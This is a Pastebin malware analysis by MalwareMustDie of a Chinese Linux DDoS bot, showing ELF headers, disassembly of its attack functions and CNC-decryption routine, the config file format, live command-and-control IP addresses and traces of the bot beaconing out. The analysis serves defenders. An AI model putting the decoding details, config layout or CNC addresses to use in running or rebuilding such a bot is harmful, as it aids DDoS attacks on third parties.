API tools faq
paste
MalwareMustDie

Chinese ELF: profild && keymap22 highlights..

MalwareMustDie
Sep 2nd, 2014
3,137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 17.28 KB | None | 0 0
raw download clone embed print report
  1. # MalwareMustDie China ELF DDoSer Analysis
  2. # Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
  3. # ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  4. # VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/
  5.  
  6. # Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
  7. https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/
  8. # Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/u different port number as CNC)
  9. https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/
  10.  
  11. # =============================
  12. # Binary Analysis
  13. # =============================
  14.  
  15. ELF Header:
  16.   Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  17.   Class:                             ELF32
  18.   Data:                              2s complement, little endian
  19.   Version:                           1 (current)
  20.   OS/ABI:                            UNIX - System V
  21.   ABI Version:                       0
  22.   Type:                              EXEC (Executable file)
  23.   Machine:                           Intel 80386
  24.   Version:                           0x1
  25.   Entry point address:               0x8048120
  26.   Start of program headers:          52 (bytes into file)
  27.   Start of section headers:          1199680 (bytes into file)
  28.   Flags:                             0x0
  29.   Size of this header:               52 (bytes)
  30.   Size of program headers:           32 (bytes)
  31.   Number of program headers:         5
  32.   Size of section headers:           40 (bytes)
  33.   Number of section headers:         28
  34.   Section header string table index: 25
  35.  
  36. Section Headers:
  37.   [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  38.   [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  39.   [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  40.   [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  41.   [ 3] .text             PROGBITS        08048120 000120 0e3800 00  AX  0   0 32
  42.   [ 4] __libc_freeres_fn PROGBITS        0812b920 0e3920 000f6e 00  AX  0   0  4
  43.   [ 5] __libc_thread_fre PROGBITS        0812c890 0e4890 0000e2 00  AX  0   0  4
  44.   [ 6] .fini             PROGBITS        0812c974 0e4974 00001a 00  AX  0   0  4
  45.   [ 7] .rodata           PROGBITS        0812c9a0 0e49a0 021eee 00   A  0   0 32
  46.   [ 8] __libc_subfreeres PROGBITS        0814e890 106890 00003c 00   A  0   0  4
  47.   [ 9] __libc_atexit     PROGBITS        0814e8cc 1068cc 000004 00   A  0   0  4
  48.   [10] __libc_thread_sub PROGBITS        0814e8d0 1068d0 000004 00   A  0   0  4
  49.   [11] .eh_frame         PROGBITS        0814e8d4 1068d4 016d08 00   A  0   0  4
  50.   [12] .gcc_except_table PROGBITS        081655dc 11d5dc 005049 00   A  0   0  4
  51.   [13] .tdata            PROGBITS        0816b628 122628 000014 00 WAT  0   0  4
  52.   [14] .tbss             NOBITS          0816b63c 12263c 00001c 00 WAT  0   0  4
  53.   [15] .ctors            PROGBITS        0816b63c 12263c 00002c 00  WA  0   0  4
  54.   [16] .dtors            PROGBITS        0816b668 122668 00000c 00  WA  0   0  4
  55.   [17] .jcr              PROGBITS        0816b674 122674 000004 00  WA  0   0  4
  56.   [18] .data.rel.ro      PROGBITS        0816b680 122680 00063c 00  WA  0   0 32
  57.   [19] .got              PROGBITS        0816bcbc 122cbc 00005c 04  WA  0   0  4
  58.   [20] .got.plt          PROGBITS        0816bd18 122d18 00000c 04  WA  0   0  4
  59.   [21] .data             PROGBITS        0816bd40 122d40 001034 00  WA  0   0 32
  60.   [22] .bss              NOBITS          0816cd80 123d74 0091d8 00  WA  0   0 32
  61.   [23] __libc_freeres_pt NOBITS          08175f58 123d74 000020 00  WA  0   0  4
  62.   [24] .comment          PROGBITS        00000000 123d74 000fa5 00      0   0  1
  63.   [25] .shstrtab         STRTAB          00000000 124d19 000126 00      0   0  1
  64.   [26] .symtab           SYMTAB          00000000 1252a0 018110 10     27 1246  4
  65.   [27] .strtab           STRTAB          00000000 13d3b0 03224e 00      0   0  1
  66.  
  67. Program Headers:
  68.   Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  69.   LOAD           0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
  70.   LOAD           0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW  0x1000
  71.   NOTE           0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R   0x4
  72.   TLS            0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R   0x4
  73.   GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
  74.  
  75.  Section to Segment mapping:
  76.   Segment Sections...
  77.    00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
  78.    01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
  79.    02     .note.ABI-tag
  80.    03     .tdata .tbss
  81.  
  82. Offset 0x000000d4 | len x00000020:
  83.   Owner         Data size       Description
  84.   GNU           0x00000010      NT_VERSION (version)
  85.  
  86. // Notes:
  87. no dynamic section
  88. no relocations
  89. no unwind sections
  90.  
  91. # =============================
  92. # Reversing w/debug PoC
  93. # =============================
  94.  
  95. // first section reversed (for characteristic)
  96.             ;-- section..text:
  97.             0x08048120    31ed         xor ebp, ebp
  98.             0x08048122    5e           pop esi
  99.             0x08048123    89e1         mov ecx, esp
  100.             0x08048125    83e4f0       and esp, 0xfffffff0
  101.             0x08048128    50           push eax
  102.             0x08048129    54           push esp
  103.             0x0804812a    52           push edx
  104.             0x0804812b    68f4c20c08   push sym.__libc_csu_fini ; 0x080cc2f4
  105.             0x08048130    689cc20c08   push sym.__libc_csu_init ; 0x080cc29c
  106.             0x08048135    51           push ecx
  107.             0x08048136    56           push esi
  108.             0x08048137    681ca70408   push sym.main ; 0x0804a71c
  109.             0x0804813c    e8cf390800   call sym.__libc_start_main
  110.                0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
  111.             0x08048141    f4           hlt
  112.             0x08048142    90           nop
  113.             0x08048143    90           nop
  114.  
  115. // Chinese lang
  116.  
  117. .rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
  118. 0x00747E0  CUNG5
  119. 0x007518F  CUNG
  120. 0x0075693  B4CUNG
  121. 0x0102520  i18n:1999
  122.   :
  123.  
  124. // config:
  125. 0x00E5C22  fake.cfg
  126. // template:
  127. %d
  128. %d.%d.%d.%d:%d.%d.%d.%d
  129. %d:%d
  130.  
  131. // poc:
  132. # cat fake.cfg
  133. 0
  134. YOUR-IP-HERE:AND-HERE
  135. 10000:60000
  136.  
  137. // get ethernet IP address local to be written in the fake.cfg:
  138.  
  139. getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0
  140.  
  141.  
  142. //testing  internet connection by baidu.com (DNS query)
  143.  
  144. 0x00E50FD  www.baidu.com
  145. // PoC:
  146. sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
  147. recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74
  148.  
  149. // compile/compat traces:
  150.  
  151. 0x0124CC0  GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
  152. 0x0124CED  GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)
  153.  
  154. // Sources:
  155.  
  156.  'crtstuff.c'
  157.  'Fake.cpp'
  158.  'Global.cpp'
  159.  'main.cpp'
  160.  'Manager.cpp'
  161.  'ProtocolUtil.cpp'
  162.  'ServerIP.cpp'
  163.  'StatBase.cpp'
  164.  'ThreadAttack.cpp'
  165.  'ThreadAttackKernal.cpp'
  166.  'ThreadHostStatus.cpp'
  167.  'ThreadTaskManager.cpp'
  168.  'ThreadTimer.cpp'
  169.  'AutoLock.cpp'
  170.  'FileOp.cpp'
  171.  'Log.cpp'
  172.  'Md5.cpp'
  173.  'Media.cpp'
  174.  'NetBase.cpp'
  175.  'ThreadCondition.cpp'
  176.  'Thread.cpp'
  177.  'ThreadMutex.cpp'
  178.  'Utility.cpp'
  179.  
  180. // And the ThreadAttack.cpp is the key function to make these
  181. // attacks/offensive malicious activities calls:
  182.  
  183. CThreadAttack::ProcessMain(void)
  184. CThreadAttack::EmptyConnectionAtk(CSubTask &)
  185. CThreadAttack::HttpAtk(CSubTask &)
  186. CThreadAttack::FakeUserAtk(CSubTask &)
  187. CThreadAttack::Stop(void)  
  188. CThreadAttack::DomainInitEx(CRandArray &,char  const*)  
  189. CThreadAttack::DomainRandEx(CRandArray &,int &)
  190. CThreadAttack::CrossPkt(int)
  191. CThreadAttack::~CThreadAttack()
  192. CThreadAttack::CThreadAttack(CManager *)
  193. CThreadAttack::Start(CCmdMessage *)
  194. CThreadAttack::InitCrossPkts(std::vector<uint,std::allocator<uint>..
  195. CThreadAttack::PktAtk(CSubTask &,std::vector<uint,std::allocator<..
  196.  
  197. // Key Attacks Noted beside DDoS:
  198.  
  199.   0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  200.   0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  201.   0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  202.   0x805478A push ebp
  203.   0x805478B mov  ebp, esp
  204.   0x805478D leave
  205.   0x805478E retn
  206.   0x805478E
  207.   0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
  208.  
  209.   0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  210.   0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
  211.   0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  212.   0x8054790 push ebp
  213.   0x8054791 mov  ebp, esp
  214.   0x8054793 leave
  215.   0x8054794 retn
  216.   0x8054794
  217.   0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
  218.  
  219.   0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  220.   0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  221.   0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  222.   0x8054796 push ebp
  223.   0x8054797 mov  ebp, esp
  224.   0x8054799 leave
  225.   0x805479A retn
  226.   0x805479A
  227.   0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  228.  
  229. // Spawn processes and connecting to the CNC (noted 44 process will be spawned for the callbacks):
  230.      :
  231.   0x80532D2 sub  esp, 214h ; Integer Subtraction
  232.   0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  233.   0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  234.   0x80532E3 mov  eax, 100h
  235.   0x80532E8 sub  esp, 4  ; Integer Subtraction
  236.   0x80532EB push eax
  237.   0x80532EC push edx
  238.   0x80532ED push ecx
  239.   0x80532EE call memcpy  ; Call Procedure
  240.   0x80532F3 add  esp, 10h; Add
  241.   0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  242.   0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  243.   0x8053301 mov  eax, 100h
  244.   0x8053306 sub  esp, 4  ; Integer Subtraction
  245.   0x8053309 push eax
  246.   0x805330A push edx
  247.   0x805330B push ecx
  248.   0x805330C call memcpy  ; Call Procedure
  249.   0x8053311 add  esp, 10h; Add
  250.   0x8053314 push 27h
  251.   0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  252.   0x805331B push 0FFh
  253.   0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  254.   0x8053326 push eax
  255.   0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  256.   0x805332C add  esp, 10h; Add
  257.   0x805332F push 0Ah
  258.   0x8053331 push offset a63551; "63551" ; <============================
  259.   0x8053336 push 0FFh
  260.   0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  261.   0x8053341 push eax
  262.   0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const
  263.  
  264.  
  265. // Heres the decryption codes for cracking CNC..:
  266.  
  267.   0x8062EF0
  268.   0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  269.   0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  270.   0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  271.   0x8062EF0 ; CServerIP::Initialize(void)
  272.   0x8062EF0
  273.   0x8062EF0 var_4= dword ptr -4
  274.   0x8062EF0 arg_0= dword ptr  8
  275.   0x8062EF0 arg_4= dword ptr  0Ch
  276.   0x8062EF0 arg_8= dword ptr  10h
  277.   0x8062EF0 arg_C= dword ptr  14h
  278.   0x8062EF0
  279.   0x8062EF0 push ebp
  280.   0x8062EF1 mov  ebp, esp
  281.   0x8062EF3 sub  esp, 10h; Integer Subtraction
  282.   0x8062EF6 mov  [ebp+var_4], 0
  283.   0x8062EFD jmp  short loc_8062F36 ; Jump
  284.   0x8062EFD
  285.   0x8062EFF
  286.   0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  287.   0x8062EFF mov  eax, [ebp+var_4]
  288.   0x8062F02 and  eax, 1  ; Logical AND
  289.   0x8062F05 test al, al  ; Logical Compare
  290.   0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  291.   0x8062F07
  292.   0x8062F09 mov  eax, [ebp+var_4]
  293.   0x8062F0C mov  edx, eax
  294.   0x8062F0E add  edx, [ebp+arg_0] ; Add
  295.   0x8062F11 mov  eax, [ebp+var_4]
  296.   0x8062F14 add  eax, [ebp+arg_8] ; Add
  297.   0x8062F17 mov  al, [eax]
  298.   0x8062F19 inc  eax  ; Increment by 1
  299.   0x8062F1A mov  [edx], al
  300.   0x8062F1C jmp  short loc_8062F31 ; Jump
  301.   0x8062F1C
  302.   0x8062F1E
  303.   0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  304.   0x8062F1E mov  eax, [ebp+var_4]
  305.   0x8062F21 mov  edx, eax
  306.   0x8062F23 add  edx, [ebp+arg_0] ; Add
  307.   0x8062F26 mov  eax, [ebp+var_4]
  308.   0x8062F29 add  eax, [ebp+arg_8] ; Add
  309.   0x8062F2C mov  al, [eax]
  310.   0x8062F2E dec  eax  ; Decrement by 1
  311.   0x8062F2F mov  [edx], al
  312.   0x8062F2F
  313.   0x8062F31
  314.   0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  315.   0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  316.   0x8062F34 inc  dword ptr [eax] ; Increment by 1
  317.   0x8062F34
  318.   0x8062F36
  319.   0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  320.   0x8062F36 mov  eax, [ebp+var_4]
  321.   0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  322.   0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  323.   0x8062F3C
  324.   0x8062F3E mov  eax, [ebp+var_4]
  325.   0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  326.   0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  327.   0x8062F44
  328.   0x8062F46 mov  eax, [ebp+var_4]
  329.   0x8062F49 add  eax, [ebp+arg_8] ; Add
  330.   0x8062F4C mov  al, [eax]
  331.   0x8062F4E test al, al  ; Logical Compare
  332.   0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  333.   0x8062F50
  334.   0x8062F52
  335.   0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  336.   0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  337.   0x8062F52 leave; High Level Procedure Exit
  338.   0x8062F53 retn ; Return Near from Procedure
  339.   0x8062F53
  340.   0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  341.   0x8062F53
  342.  
  343. // CNC Decoded:
  344.  
  345. 61.147.103.21:54460
  346.  
  347. // PoC-ed:
  348.  
  349. connect(3, {sa_family=AF_INET, sin_port=htons(54460), sin_addr=inet_addr("61.147.103.21")}, 16) = -1 EINPROGRESS (flag)
  350. send(3, "\270\v\0\0\0N.%EN.%E\20'`\352MMD-IS-BANGING-YOU-B1TCH! x.x.x.x"..., 401, 0) = 401
  351.  
  352. // Spawning process PoC (44 rounds w/ one parent as per reversed)
  353. Process 17553 detached
  354. Process 17552 detached
  355.   :
  356. Process 17593 detached
  357. Process 17594 detached
  358.  
  359. // CNC communication:
  360. // Two steps communication:
  361.  
  362. // 1. sent establish HTTP request to 180.76.3.151
  363.  
  364. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
  365. setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
  366. setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
  367. fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
  368. fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
  369. connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("180.76.3.151")}, 16) = -1 EINPROGRESS
  370.  
  371. x.x.x.x 180.76.3.151    TCP 74  48417 > http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
  372. 180.76.3.151    x.x.x.x TCP 74  http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
  373. x.x.x.x 180.76.3.151    TCP 54  48417 > http [RST] Seq=1 Win=0 Len=0
  374.  
  375. // 2. sent infected machine data to CNC:
  376.  
  377. x.x.x.x 61.147.103.21   TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401
  378.  
  379. 00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
  380. 00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
  381. 00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
  382. 00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  383. 00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  384. 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  385. 00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  386. 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  387. 00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  388. 00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  389. 000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  390. 000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  391. 000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  392. 000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  393. 000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  394. 000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  395. 00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  396. 00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  397. 00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  398. 00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  399. 00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  400. 00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  401. 00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  402. 00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  403. 00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  404. 00000190  00                                               .
  405.  
  406. ----
  407. #MalwareMustDie!
  408. /* This analysis post is dedicated to all UNIX sysadmins */
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!